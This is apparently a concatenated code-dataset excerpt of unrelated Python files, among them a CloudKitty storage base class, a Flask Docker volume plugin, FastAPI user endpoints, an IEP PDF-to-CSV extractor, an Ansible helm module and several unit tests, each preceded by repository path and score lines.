# -*- coding: utf-8 -*- # Copyright 2018 Objectif Libre # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # # @author: <NAME> # import abc import datetime from oslo_config import cfg import six from cloudkitty import storage_state storage_opts = [ cfg.IntOpt( 'retention_period', default=2400, help='Duration after which data should be cleaned up/aggregated. ' 'Duration is given in hours. Defaults to 2400 (100 days)' ), ] CONF = cfg.CONF CONF.register_opts(storage_opts, 'storage') @six.add_metaclass(abc.ABCMeta) class BaseStorage(object): """Abstract class for v2 storage objects.""" def __init__(self, *args, **kwargs): """Left empty so that child classes don't need to implement this.""" @abc.abstractmethod def init(self): """Called for storage backend initialization""" # NOTE(peschk_l): scope_id must not be used by any v2 storage backend. It # is only present for backward compatibility with the v1 storage. It will # be removed together with the v1 storage @abc.abstractmethod def push(self, dataframes, scope_id=None): """Pushes dataframes to the storage backend A dataframe has the following format:: { "usage": { "bananas": [ # metric name { "vol": { "unit": "banana", "qty": 1 }, "rating": { "price": 1 }, "groupby": { "xxx_id": "hello", "yyy_id": "bye", }, "metadata": { "flavor": "chocolate", "eaten_by": "gorilla", }, } ], "metric_name2": [...], } "period": { "begin": "1239781290", # timestamp "end": "1239793490", # timestamp } } :param dataframes: List of dataframes :type dataframes: list """ @abc.abstractmethod def retrieve(self, begin=None, end=None, filters=None, group_filters=None, metric_types=None, offset=0, limit=1000, paginate=True): """Returns the following dict:: { 'total': int, # total amount of measures found 'dataframes': list of dataframes, } :param begin: Start date :type begin: datetime :param end: End date :type end: datetime :param filters: Metadata to filter on. ex: {'flavor_id': '42'} :type filters: dict :param group_filters: Groupby to filter on. ex: {'project_id': '123ab'} :type group_filters: dict :param metric_types: Metric type to filter on. :type metric_types: str or list :param offset: Offset for pagination :type offset: int :param limit: Maximum amount of elements to return :type limit: int :param paginate: Defaults to True. If False, all found results will be returned. :type paginate: bool :rtype: dict """ @abc.abstractmethod def total(self, groupby=None, begin=None, end=None, metric_types=None, filters=None, group_filters=None, offset=0, limit=1000, paginate=True): """Returns a grouped total for given groupby. :param groupby: Attributes on which to group by. These attributes must be part of the 'groupby' section for the given metric type in metrics.yml. In order to group by metric type, add 'type' to the groupby list. :type groupby: list of strings :param begin: Start date :type begin: datetime :param end: End date :type end: datetime :param filters: Metadata to filter on. ex: {'flavor_id': '42'} :type filters: dict :param group_filters: Groupby to filter on. ex: {'project_id': '123ab'} :type group_filters: dict :param metric_types: Metric type to filter on. :type metric_types: str or list :param offset: Offset for pagination :type offset: int :param limit: Maximum amount of elements to return :type limit: int :param paginate: Defaults to True. If False, all found results will be returned. :type paginate: bool :rtype: dict Returns a dict with the following format:: { 'total': int, # total amount of results found 'results': list of results, } Each result has the following format:: { 'begin': XXX, 'end': XXX, 'rate': XXX, 'groupby1': XXX, 'groupby2': XXX } """ @staticmethod def get_retention(): """Returns the retention period defined in the configuration. :rtype: datetime.timedelta """ return datetime.timedelta(hours=CONF.storage.retention_period) # NOTE(lpeschke): This is only kept for v1 storage backward compatibility def get_tenants(self, begin=None, end=None): return storage_state.StateManager().get_tenants(begin, end)
1.492188
1
pyvolume/manager.py
ronin13/pyvolume
2
12752811
<gh_stars>1-10 # -*- coding: utf-8 -*- """ Module providing the MountMgr, VolumeManager and Flask methods. Following Docker Volume endpoints are routed below: '/Plugin.Activate' '/VolumeDriver.Create' '/VolumeDriver.Remove' '/VolumeDriver.List' '/VolumeDriver.Path' '/VolumeDriver.Mount' '/VolumeDriver.Unmount' '/VolumeDriver.Get' '/VolumeDriver.Capabilities' """ from __future__ import unicode_literals from __future__ import absolute_import import argparse import logging from flask import Flask from flask import jsonify from flask import request from pyvolume.local import EphemeralFileSystem from pyvolume.sshfs import SSHFileSystem from pyvolume.zkfuse import ZKFileSystem app = Flask(__name__) HOST = "0.0.0.0" PORT = 1331 DRIVER_TYPE = "sshfs" DEFAULT_BASE = "/mnt" logging.basicConfig(level=logging.INFO) log = logging.getLogger(__name__) class MountMgr(object): """ MountMgr is a helper class used during mounting/unmounting.""" def __init__(self, counter, mntpoint): self.counter = counter self.mntpoint = mntpoint class VolumeManager(object): """ VolumeManager is the class providing pluggable drivers for pyvolume, the drivers implementing the methods: 1. create 2. list 3. path 4. remove 5. mount 6. umount 7. scope 8. cleanup Currently, drivers available are EphemeralFileSystem, SSHFileSystem and Zookeeper FileSystem """ def __init__(self, driver, prefix): if driver == "ephemeral": self.driver = EphemeralFileSystem(prefix) elif driver == "sshfs": self.driver = SSHFileSystem(prefix) elif driver == "zookeeper": self.driver = ZKFileSystem(prefix) self.mount_mgr = {} self.driver_type = driver def cleanup(self): """ Cleanup done during shutdown of server.""" for volume in self.mount_mgr: self.mount_mgr[volume].counter = 0 self.mount_mgr[volume].mntpoint = None self.driver.cleanup() def dispatch(data): """ To jsonify the response with correct HTTP status code. Status codes: 200: OK 400: Error Err in JSON is non empty if there is an error. """ if "Err" in data and data["Err"] != "": code = 400 else: code = 200 resp = jsonify(data) resp.status_code = code return resp @app.route("/Plugin.Activate", methods=["POST"]) def implements(): """ Routes Docker Volume '/Plugin.Activate'.""" return dispatch({"Implements": ["VolumeDriver"]}) @app.route("/VolumeDriver.Create", methods=["POST"]) def create_volume(): """ Routes Docker Volume '/VolumeDriver.Create'.""" volm = app.config["volmer"] rdata = request.get_json(force=True) vol_name = rdata["Name"].strip("/") options = rdata["Opts"] try: volm.driver.create(vol_name, options) except Exception as e: return dispatch( {"Err": "Failed to create the volume {0} : {1}".format(vol_name, str(e))} ) return dispatch({"Err": ""}) @app.route("/") def index(): return "Docker volume driver listening on " + str(PORT) @app.route("/VolumeDriver.Remove", methods=["POST"]) def remove_volume(): """ Routes Docker Volume '/VolumeDriver.Remove'.""" volm = app.config["volmer"] rdata = request.get_json(force=True) vol_name = rdata["Name"].strip("/") try: volm.driver.remove(vol_name) except Exception as e: return dispatch( {"Err": "Failed to remove the volume {0}: {1}".format(vol_name, str(e))} ) return dispatch({"Err": ""}) @app.route("/VolumeDriver.Mount", methods=["POST"]) def mount_volume(): """ Routes Docker Volume '/VolumeDriver.Mount'. Handles multiple invocations of mount for same volume. """ volm = app.config["volmer"] rdata = request.get_json(force=True) vol_name = rdata["Name"].strip("/") # vol_id = rdata['ID'] if vol_name in volm.mount_mgr: mntpoint = volm.mount_mgr[vol_name].mntpoint volm.mount_mgr[vol_name].counter += 1 log.info( "Volume {0} is mounted {1} times".format( vol_name, volm.mount_mgr[vol_name].counter ) ) return dispatch({"Mountpoint": mntpoint, "Err": ""}) try: mntpoint = volm.driver.mount(vol_name) volm.mount_mgr[vol_name] = MountMgr(1, mntpoint) except Exception as e: return dispatch( { "Mountpoint": "", "Err": "Failed to mount the volume {0}: {1}".format(vol_name, str(e)), } ) return dispatch({"Mountpoint": mntpoint, "Err": ""}) @app.route("/VolumeDriver.Path", methods=["POST"]) def path_volume(): """ Routes Docker Volume '/VolumeDriver.Path'. Returns Err if volume is not mounted. """ volm = app.config["volmer"] rdata = request.get_json(force=True) vol_name = rdata["Name"].strip("/") try: mntpoint = volm.driver.path(vol_name) except Exception as e: return dispatch( { "Mountpoint": "", "Err": "Failed to obtain path to the volume {0}: {1}".format( vol_name, str(e) ), } ) if not mntpoint: return dispatch( {"Mountpoint": "", "Err": "Volume {0} is not mounted".format(vol_name)} ) return dispatch({"Mountpoint": mntpoint, "Err": ""}) @app.route("/VolumeDriver.Unmount", methods=["POST"]) def unmount_volume(): """ Routes Docker Volume '/VolumeDriver.Unmount'. Handles multiple Unmount requests for volume mounted multiple times by only unmounting the last time. """ volm = app.config["volmer"] rdata = request.get_json(force=True) vol_name = rdata["Name"].strip("/") # vol_id = rdata['ID'] if vol_name in volm.mount_mgr: # mntpoint = volm.mount_mgr[vol_name].mntpoint volm.mount_mgr[vol_name].counter -= 1 if volm.mount_mgr[vol_name].counter > 0: log.info( "Still mounted {0} times to unmount".format( volm.mount_mgr[vol_name].counter ) ) return dispatch({"Err": ""}) try: res = volm.driver.umount(vol_name) if not res: return dispatch( {"Err": "Volume {0} may already be unmounted.".format(vol_name)} ) volm.mount_mgr.pop(vol_name) except Exception as e: return dispatch( {"Err": "Failed to umount the volume {0}: {1}".format(vol_name, str(e))} ) return dispatch({"Err": ""}) @app.route("/VolumeDriver.Get", methods=["POST"]) def get_volume(): """ Routes Docker Volume '/VolumeDriver.Get'.""" volm = app.config["volmer"] rdata = request.get_json(force=True) vol_name = rdata["Name"].strip("/") try: mntpoint = volm.driver.path(vol_name) except Exception as e: return dispatch( { "Err": "Failed to get the volume path for {0}: {1}".format( vol_name, str(e) ) } ) if not mntpoint: return dispatch( {"Mountpoint": "", "Err": "Volume {0} is not mounted".format(vol_name)} ) return dispatch( { "Volume": {"Name": vol_name, "Mountpoint": mntpoint, "Status": {},}, "Err": "", } ) @app.route("/VolumeDriver.List", methods=["POST"]) def list_volume(): """ Routes Docker Volume '/VolumeDriver.List'.""" volm = app.config["volmer"] mnt_list = [] try: vol_list = volm.driver.list() for volume in vol_list: mntpoint = volm.driver.path(volume) if not mntpoint: mntpoint = "<NOT-MOUNTED>" mnt_list += [{"Name": volume, "Mountpoint": mntpoint,}] except Exception as e: return dispatch({"Err": "Failed to list the volumes: {0}".format(str(e))}) return dispatch({"Volumes": mnt_list, "Err": "",}) @app.route("/VolumeDriver.Capabilities", methods=["POST"]) def capabilities_volume(): """ Routes Docker Volume '/VolumeDriver.Capabilities'.""" volm = app.config["volmer"] scope = volm.driver.scope() return dispatch({"Capabilities": {"Scope": scope}}) def shutdown_server(): """ Utility method for shutting down the server.""" func = request.environ.get("werkzeug.server.shutdown") if func is None: raise RuntimeError("Not running with the Werkzeug Server") func() @app.route("/shutdown", methods=["POST"]) def shutdown(): """ API end point exposed to shutdown the server.""" shutdown_server() return "Server shutting down..." parser = argparse.ArgumentParser(description="Arguments to volume router") parser.add_argument( "-t", "--driver", default=DRIVER_TYPE, help="Type of driver to use", choices=["sshfs", "ephemeral", "zookeeper"], ) parser.add_argument("-H", "--host", default=HOST, help="Host to listen on") parser.add_argument("-p", "--port", default=PORT, help="Port to listen on") parser.add_argument( "-m", "--base", default=DEFAULT_BASE, help="Base directory to mount over, default is " + DEFAULT_BASE, ) def start(): global PORT global HOST args = parser.parse_args() PORT = args.port HOST = args.host volmer = VolumeManager(args.driver, prefix=args.base) app.config["volmer"] = volmer try: app.run(host=args.host, port=args.port) finally: volmer.cleanup() if __name__ == "__main__": start()
1.601563
2
backend/app/api/api_v1/endpoints/users.py
BartlomiejRasztabiga/Rentally
2
12752939
<filename>backend/app/api/api_v1/endpoints/users.py from typing import Any, List from fastapi import APIRouter, Depends, HTTPException from sqlalchemy.orm import Session from app import models, schemas, services from app.api import deps router = APIRouter() @router.get("/", response_model=List[schemas.User]) def read_users( db: Session = Depends(deps.get_db), current_user: models.User = Depends(deps.get_current_active_admin), ) -> Any: """ Retrieve users. """ users = services.user.get_all(db) return users @router.post("/", response_model=schemas.User) def create_user( *, db: Session = Depends(deps.get_db), user_in: schemas.UserCreateDto, current_user: models.User = Depends(deps.get_current_active_admin), ) -> Any: """ Create new user. """ user = services.user.get_by_email(db, email=user_in.email) if user: raise HTTPException( status_code=400, detail="The user with this username already exists in the system.", ) user = services.user.create(db, obj_in=user_in) return user @router.get("/me", response_model=schemas.User) def read_user_me( db: Session = Depends(deps.get_db), current_user: models.User = Depends(deps.get_current_user), ) -> Any: """ Get current user. """ return current_user @router.get("/{user_id}", response_model=schemas.User) def read_user_by_id( user_id: int, current_user: models.User = Depends(deps.get_current_user), db: Session = Depends(deps.get_db), ) -> Any: """ Get a specific user by id. """ user = services.user.get(db, _id=user_id) if user == current_user: return user if not services.user.is_admin(current_user): raise HTTPException( status_code=400, detail="The user doesn't have enough privileges" ) return user
1.398438
1
iep2csv.py
gregorysenyshyn/IEPeasy
0
12753067
<gh_stars>0 #! /usr/bin/env python3 import argparse import os import re import csv import PyPDF2 def get_data_re(): return re.compile('Individual Education Plan for (.+?)Student ID.+?OEN ([0-9]{3}-[0-9]{3}-[0-9]{3}).+?Accommodations Instructional Environmental Assessment(.+?)(Human|!).+?<NAME> Date') def file_checker(args, value_type, message): if vars(args)[value_type] is not None: if os.path.exists(vars(args)[value_type]): return vars(args)[value_type] else: value = None while not value: value = input(f"{message} location: ").strip() if os.path.exists(value): return value else: print(f"{value} is not a valid location") value = None def extract_data(iep_text): data_re = get_data_re() data = data_re.finditer(iep_text) return data def main(folder, output_dir): all_ieps_data = [] for filename in os.listdir(folder): with open(os.path.join(folder, filename), 'rb') as f: reader = PyPDF2.PdfFileReader(f) writer = PyPDF2.PdfFileWriter() current_ugcloud = None iep_text = '' print(f"processing {filename} pages...\n") for page in reader.pages: raw_text = page.extractText() iep_text += raw_text.replace("\n"," ") students = extract_data(iep_text) for student in students: all_ieps_data.append(student) with open(args.output, 'a', newline='') as f: data_writer = csv.writer(f) for item in all_ieps_data: data_writer.writerow([item.group(1), item.group(2), item.group(3)]) if __name__ == '__main__': parser = argparse.ArgumentParser(description=("Takes a folder with PDFs of IEPS" "and copies specified fields to a CSV file")) parser.add_argument("-f", "--folder", dest="folder") parser.add_argument("-o", "--output", dest="output") args = parser.parse_args() print(args) folder = file_checker(args, "folder", "Folder of PDFs of IEPs") output = file_checker(args, "output", "Output") main(folder, output)
1.570313
2
CSIKit/legacy/utils.py
FredeJ/CSIKit
67
12753195
<filename>CSIKit/legacy/utils.py def configure_tx_chains(txChains, streamNum, mcsIdx): txChains = txChains.lower() RATE_MCS_ANT_A_MSK = 0x04000 RATE_MCS_ANT_B_MSK = 0x08000 RATE_MCS_ANT_C_MSK = 0x10000 RATE_MCS_HT_MSK = 0x00100 mask = 0x0 usedAntNum = 0 if "a" in txChains: mask |= RATE_MCS_ANT_A_MSK usedAntNum += 1 if "b" in txChains: mask |= RATE_MCS_ANT_B_MSK usedAntNum += 1 if "c" in txChains: mask |= RATE_MCS_ANT_C_MSK usedAntNum += 1 mask |= RATE_MCS_HT_MSK if streamNum > usedAntNum: print("Cannot use {} streams with {} antennas".format(streamNum, usedAntNum)) print("Set stream num to {}".format(usedAntNum)) streamNum = usedAntNum mcsMask = mcsIdx if streamNum == 2: mcsMask += 8 elif streamNum == 3: mcsMask += 16 mask |= mcsMask mask = "0x{:05x}".format(mask) print("Set TX mask: ", mask) filePath = "/sys/kernel/debug/iwlwifi/0000:03:00.0/iwldvm/debug/monitor_tx_rate" f = open(filePath, 'w') f.write(mask) f.close() def configure_rx_chains(rxChains): rxChains = rxChains.lower() mask = 0x0 aMask = 0x1 bMask = 0x2 cMask = 0x4 if "a" in rxChains: mask |= aMask if "b" in rxChains: mask |= bMask if "c" in rxChains: mask |= cMask mask = "0x{:01x}".format(mask) print("Set RX chain mask: ", mask) filePath = "/sys/kernel/debug/iwlwifi/0000:03:00.0/iwldvm/debug/rx_chains_msk" f = open(filePath, 'w') f.write(mask) f.close()
1.414063
1
cloudify/tests/test_missing_operation.py
isaac-s/cloudify-common
0
12753323
<reponame>isaac-s/cloudify-common ######## # Copyright (c) 2014 GigaSpaces Technologies Ltd. All rights reserved # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # * See the License for the specific language governing permissions and # * limitations under the License. from os import path import testtools from cloudify.decorators import workflow from cloudify.test_utils import workflow_test @workflow def not_exist_op_workflow(ctx, **kwargs): for node in ctx.nodes: for instance in node.instances: instance.execute_operation( 'cloudify.interfaces.lifecycle.op_not_exist') @workflow def not_exist_interface_workflow(ctx, **kwargs): for node in ctx.nodes: for instance in node.instances: instance.execute_operation( 'cloudify.interfaces.interfaces_not_exist.create') @workflow def stop_workflow(ctx, **kwargs): for node in ctx.nodes: for instance in node.instances: instance.execute_operation( 'cloudify.interfaces.lifecycle.stop') class TestExecuteNotExistOperationWorkflow(testtools.TestCase): execute_blueprint_path = path.join('resources', 'blueprints', 'not_exist_op_workflow-blueprint.yaml') @workflow_test(execute_blueprint_path) def test_execute_not_exist_operation(self, cfy_local): node_id = cfy_local.plan.get('node_instances')[0].get('id') try: cfy_local.execute('not_exist_op_workflow') self.fail('Expected exception due to operation not exist') except Exception as e: self.assertTrue('operation of node instance {0} does not exist' .format(node_id) in e.message) @workflow_test(execute_blueprint_path) def test_execute_not_exist_interface(self, cfy_local): node_id = cfy_local.plan.get('node_instances')[0].get('id') try: cfy_local.execute('not_exist_interface_workflow') self.fail('Expected exception due to operation not exist') except Exception as e: self.assertTrue('operation of node instance {0} does not exist' .format(node_id) in e.message) @workflow_test(execute_blueprint_path) def test_execute_stop_operation(self, cfy_local): # checks that an operation that exists in a builtin interface # does not raise an exception if it is not declared in the blueprint cfy_local.execute('stop_workflow')
1.359375
1
study/sparql/queries/describe.py
arthurTemporim/semantic_web_playground
0
12753451
<reponame>arthurTemporim/semantic_web_playground<gh_stars>0 from SPARQLWrapper import SPARQLWrapper, N3 from rdflib import Graph sparql = SPARQLWrapper("http://dbpedia.org/sparql") sparql.setQuery(""" DESCRIBE <http://dbpedia.org/resource/Asturias> """) sparql.setReturnFormat(N3) results = sparql.query().convert() g = Graph() g.parse(data=results, format="n3") print(g.serialize(format='n3'))
1.5
2
Collections-a-installer/community-general-2.4.0/plugins/modules/helm.py
d-amien-b/simple-getwordpress
5
12753579
<filename>Collections-a-installer/community-general-2.4.0/plugins/modules/helm.py #!/usr/bin/python # (c) 2016, <NAME> <<EMAIL>> # # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type DOCUMENTATION = ''' --- deprecated: removed_in: 3.0.0 # was Ansible 2.14 why: For more details https://github.com/ansible/ansible/issues/61546. alternative: Use M(community.kubernetes.helm) instead. module: helm short_description: Manages Kubernetes packages with the Helm package manager author: "<NAME> (@flaper87)" description: - Install, upgrade, delete and list packages with the Helm package manager. requirements: - "pyhelm" - "grpcio" options: host: description: - Tiller's server host. type: str default: "localhost" port: description: - Tiller's server port. type: int default: 44134 namespace: description: - Kubernetes namespace where the chart should be installed. type: str default: "default" name: description: - Release name to manage. type: str state: description: - Whether to install C(present), remove C(absent), or purge C(purged) a package. choices: ['absent', 'purged', 'present'] type: str default: "present" chart: description: - A map describing the chart to install. See examples for available options. type: dict default: {} values: description: - A map of value options for the chart. type: dict default: {} disable_hooks: description: - Whether to disable hooks during the uninstall process. type: bool default: 'no' ''' RETURN = ''' # ''' EXAMPLES = ''' - name: Install helm chart community.general.helm: host: localhost chart: name: memcached version: 0.4.0 source: type: repo location: https://kubernetes-charts.storage.googleapis.com state: present name: my-memcached namespace: default - name: Uninstall helm chart community.general.helm: host: localhost state: absent name: my-memcached - name: Install helm chart from a git repo community.general.helm: host: localhost chart: source: type: git location: https://github.com/user/helm-chart.git state: present name: my-example namespace: default values: foo: "bar" - name: Install helm chart from a git repo specifying path community.general.helm: host: localhost chart: source: type: git location: https://github.com/helm/charts.git path: stable/memcached state: present name: my-memcached namespace: default values: "{{ lookup('file', '/path/to/file/values.yaml') | from_yaml }}" ''' import traceback HELM_IMPORT_ERR = None try: import grpc from pyhelm import tiller from pyhelm import chartbuilder except ImportError: HELM_IMPORT_ERR = traceback.format_exc() from ansible.module_utils.basic import AnsibleModule, missing_required_lib def install(module, tserver): changed = False params = module.params name = params['name'] values = params['values'] chart = module.params['chart'] namespace = module.params['namespace'] chartb = chartbuilder.ChartBuilder(chart) r_matches = (x for x in tserver.list_releases() if x.name == name and x.namespace == namespace) installed_release = next(r_matches, None) if installed_release: if installed_release.chart.metadata.version != chart['version']: tserver.update_release(chartb.get_helm_chart(), False, namespace, name=name, values=values) changed = True else: tserver.install_release(chartb.get_helm_chart(), namespace, dry_run=False, name=name, values=values) changed = True return dict(changed=changed) def delete(module, tserver, purge=False): changed = False params = module.params if not module.params['name']: module.fail_json(msg='Missing required field name') name = module.params['name'] disable_hooks = params['disable_hooks'] try: tserver.uninstall_release(name, disable_hooks, purge) changed = True except grpc._channel._Rendezvous as exc: if 'not found' not in str(exc): raise exc return dict(changed=changed) def main(): """The main function.""" module = AnsibleModule( argument_spec=dict( host=dict(type='str', default='localhost'), port=dict(type='int', default=44134), name=dict(type='str', default=''), chart=dict(type='dict'), state=dict( choices=['absent', 'purged', 'present'], default='present' ), # Install options values=dict(type='dict'), namespace=dict(type='str', default='default'), # Uninstall options disable_hooks=dict(type='bool', default=False), ), supports_check_mode=True) if HELM_IMPORT_ERR: module.fail_json(msg=missing_required_lib('pyhelm'), exception=HELM_IMPORT_ERR) host = module.params['host'] port = module.params['port'] state = module.params['state'] tserver = tiller.Tiller(host, port) if state == 'present': rst = install(module, tserver) if state in 'absent': rst = delete(module, tserver) if state in 'purged': rst = delete(module, tserver, True) module.exit_json(**rst) if __name__ == '__main__': main()
1.070313
1
tests/unit/test_dataset.py
victorbadenas/frarch
0
12753707
<filename>tests/unit/test_dataset.py import shutil import unittest from pathlib import Path import torch from frarch import datasets from frarch.utils.exceptions import DatasetNotFoundError DATA_FOLDER = Path(__file__).resolve().parent.parent / "data" class TestCaltech101(unittest.TestCase): MOCK_DATASET_ROOT = DATA_FOLDER / "caltech101" trainlst_path = MOCK_DATASET_ROOT / "train.lst" validlst_path = MOCK_DATASET_ROOT / "valid.lst" classjson_path = MOCK_DATASET_ROOT / "classes.json" classes = (DATA_FOLDER / "caltech101_classes.txt").read_text().split(",") @classmethod def setUpClass(cls): if cls.MOCK_DATASET_ROOT.exists(): shutil.rmtree(cls.MOCK_DATASET_ROOT) for c in cls.classes: (cls.MOCK_DATASET_ROOT / c).mkdir(parents=True, exist_ok=True) for i in range(10): (cls.MOCK_DATASET_ROOT / c / f"{i}.jpg").touch() @classmethod def tearDownClass(cls): if cls.MOCK_DATASET_ROOT.exists(): shutil.rmtree(cls.MOCK_DATASET_ROOT) def tearDown(self): if self.trainlst_path.exists(): self.trainlst_path.unlink() if self.validlst_path.exists(): self.validlst_path.unlink() if self.classjson_path.exists(): self.classjson_path.unlink() return super().tearDown() def test_build_caltech101_train(self): dataset = datasets.Caltech101("train", root=self.MOCK_DATASET_ROOT) self.assertIsInstance(dataset, torch.utils.data.Dataset) self.assertIsInstance(dataset.classes, dict) self.assertEquals(len(dataset.classes), 101) self.assertEquals(len(dataset.images), 909) self.assertEquals(dataset.train_lst_path, self.trainlst_path) self.assertEquals(dataset.valid_lst_path, self.validlst_path) self.assertEquals(dataset.mapper_path, self.classjson_path) self.assertTrue(self.trainlst_path.exists()) self.assertTrue(self.validlst_path.exists()) self.assertTrue(self.classjson_path.exists()) def test_build_caltech101_valid(self): dataset = datasets.Caltech101("valid", root=self.MOCK_DATASET_ROOT) self.assertIsInstance(dataset, torch.utils.data.Dataset) self.assertIsInstance(dataset.classes, dict) self.assertEquals(len(dataset.classes), 101) self.assertEquals(len(dataset.images), 101) self.assertEquals(dataset.train_lst_path, self.trainlst_path) self.assertEquals(dataset.valid_lst_path, self.validlst_path) self.assertEquals(dataset.mapper_path, self.classjson_path) self.assertTrue(self.trainlst_path.exists()) self.assertTrue(self.validlst_path.exists()) self.assertTrue(self.classjson_path.exists()) def test_caltech101_not_valid_subset(self): with self.assertRaises(ValueError): datasets.Caltech101("nope", root=self.MOCK_DATASET_ROOT) def test_caltech101_path_no_files(self): with self.assertRaises(DatasetNotFoundError): datasets.Caltech101("train", root="./nope/") def test_caltech101_get_length(self): dataset = datasets.Caltech101("valid", root=self.MOCK_DATASET_ROOT) self.assertEqual(len(dataset), 101) def test_caltech101_get_num_classes(self): dataset = datasets.Caltech101("valid", root=self.MOCK_DATASET_ROOT) self.assertEqual(dataset.get_number_classes(), 101) class TestMit67(unittest.TestCase): MOCK_DATASET_ROOT = DATA_FOLDER / "mit67" trainlst_path = MOCK_DATASET_ROOT / "train.lst" validlst_path = MOCK_DATASET_ROOT / "valid.lst" classjson_path = MOCK_DATASET_ROOT / "class_map.json" classes = (DATA_FOLDER / "mit67_classes.txt").read_text().split(",") @classmethod def setUpClass(cls): if cls.MOCK_DATASET_ROOT.exists(): shutil.rmtree(cls.MOCK_DATASET_ROOT) for c in cls.classes: (cls.MOCK_DATASET_ROOT / "Images" / c).mkdir(parents=True, exist_ok=True) for i in range(10): (cls.MOCK_DATASET_ROOT / "Images" / c / f"{i}.jpg").touch() @classmethod def tearDownClass(cls): if cls.MOCK_DATASET_ROOT.exists(): shutil.rmtree(cls.MOCK_DATASET_ROOT) def tearDown(self): if self.trainlst_path.exists(): self.trainlst_path.unlink() if self.validlst_path.exists(): self.validlst_path.unlink() if self.classjson_path.exists(): self.classjson_path.unlink() return super().tearDown() def test_build_mit67_train(self): dataset = datasets.Mit67(True, root=self.MOCK_DATASET_ROOT) self.assertIsInstance(dataset, torch.utils.data.Dataset) self.assertIsInstance(dataset.classes, dict) self.assertEquals(len(dataset.classes), 67) self.assertEquals(len(dataset.images), 603) self.assertEquals(dataset.train_lst_path, self.trainlst_path) self.assertEquals(dataset.valid_lst_path, self.validlst_path) self.assertEquals(dataset.mapper_path, self.classjson_path) self.assertTrue(self.trainlst_path.exists()) self.assertTrue(self.validlst_path.exists()) self.assertTrue(self.classjson_path.exists()) def test_build_mit67_valid(self): dataset = datasets.Mit67(False, root=self.MOCK_DATASET_ROOT) self.assertIsInstance(dataset, torch.utils.data.Dataset) self.assertIsInstance(dataset.classes, dict) self.assertEquals(len(dataset.classes), 67) self.assertEquals(len(dataset.images), 67) self.assertEquals(dataset.train_lst_path, self.trainlst_path) self.assertEquals(dataset.valid_lst_path, self.validlst_path) self.assertEquals(dataset.mapper_path, self.classjson_path) self.assertTrue(self.trainlst_path.exists()) self.assertTrue(self.validlst_path.exists()) self.assertTrue(self.classjson_path.exists()) def test_mit67_path_no_files(self): with self.assertRaises(DatasetNotFoundError): datasets.Mit67(True, root="./nope/", download=False) def test_caltech101_get_length(self): dataset = datasets.Mit67(False, root=self.MOCK_DATASET_ROOT) self.assertEqual(len(dataset), 67) def test_caltech101_get_num_classes(self): dataset = datasets.Mit67(False, root=self.MOCK_DATASET_ROOT) self.assertEqual(dataset.get_number_classes(), 67) class TestOxfordPets(unittest.TestCase): MOCK_DATASET_ROOT = DATA_FOLDER / "oxfordpets" trainlst_path = MOCK_DATASET_ROOT / "annotations" / "trainval.txt" validlst_path = MOCK_DATASET_ROOT / "annotations" / "test.txt" @classmethod def setUpClass(cls): if cls.MOCK_DATASET_ROOT.exists(): shutil.rmtree(cls.MOCK_DATASET_ROOT) cls.MOCK_DATASET_ROOT.mkdir(exist_ok=True, parents=True) (cls.MOCK_DATASET_ROOT / "images").mkdir(exist_ok=True, parents=True) shutil.copytree( str(DATA_FOLDER / "oxford_pets_lst"), str(cls.trainlst_path.parent) ) with open(DATA_FOLDER / "oxford_pets_lst" / "trainval.txt") as f: for line in f: fname = line.split(" ")[0] (cls.MOCK_DATASET_ROOT / "images" / f"{fname}.jpg").touch() @classmethod def tearDownClass(cls): if cls.MOCK_DATASET_ROOT.exists(): shutil.rmtree(cls.MOCK_DATASET_ROOT) def test_build_OxfordPets_train(self): dataset = datasets.OxfordPets("train", root=self.MOCK_DATASET_ROOT) self.assertIsInstance(dataset, torch.utils.data.Dataset) self.assertIsInstance(dataset.classes, set) self.assertEquals(len(dataset.classes), 37) self.assertEquals(len(dataset.images), 3680) self.assertEquals(dataset.train_lst_path, self.trainlst_path) self.assertEquals(dataset.valid_lst_path, self.validlst_path) self.assertTrue(self.trainlst_path.exists()) self.assertTrue(self.validlst_path.exists()) def test_build_OxfordPets_valid(self): dataset = datasets.OxfordPets("valid", root=self.MOCK_DATASET_ROOT) self.assertIsInstance(dataset, torch.utils.data.Dataset) self.assertIsInstance(dataset.classes, set) self.assertEquals(len(dataset.classes), 37) self.assertEquals(len(dataset.images), 3669) self.assertEquals(dataset.train_lst_path, self.trainlst_path) self.assertEquals(dataset.valid_lst_path, self.validlst_path) self.assertTrue(self.trainlst_path.exists()) self.assertTrue(self.validlst_path.exists()) def test_OxfordPets_path_no_files(self): with self.assertRaises(DatasetNotFoundError): datasets.OxfordPets("valid", root="./nope/", download=False) def test_OxfordPets_not_valid_subset(self): with self.assertRaises(ValueError): datasets.OxfordPets("nope", root=self.MOCK_DATASET_ROOT, download=False) def test_OxfordPets_get_length(self): dataset = datasets.OxfordPets("valid", root=self.MOCK_DATASET_ROOT) self.assertEqual(len(dataset), 3669) def test_OxfordPets_get_num_classes(self): dataset = datasets.OxfordPets("valid", root=self.MOCK_DATASET_ROOT) self.assertEqual(dataset.get_number_classes(), 37) if __name__ == "__main__": unittest.main()
1.648438
2
experiments-xml/prettyprint.py
CherryKitty/PROTON-OC
3
12753835
#pretty print method def indent(elem, level=0): i = "\n" + level*" " j = "\n" + (level-1)*" " if len(elem): if not elem.text or not elem.text.strip(): elem.text = i + " " if not elem.tail or not elem.tail.strip(): elem.tail = i for subelem in elem: indent(subelem, level+1) if not elem.tail or not elem.tail.strip(): elem.tail = j else: if level and (not elem.tail or not elem.tail.strip()): elem.tail = j return elem
2.125
2
src/schedulebot.py
dcutting133/schedule-bot
0
12753963
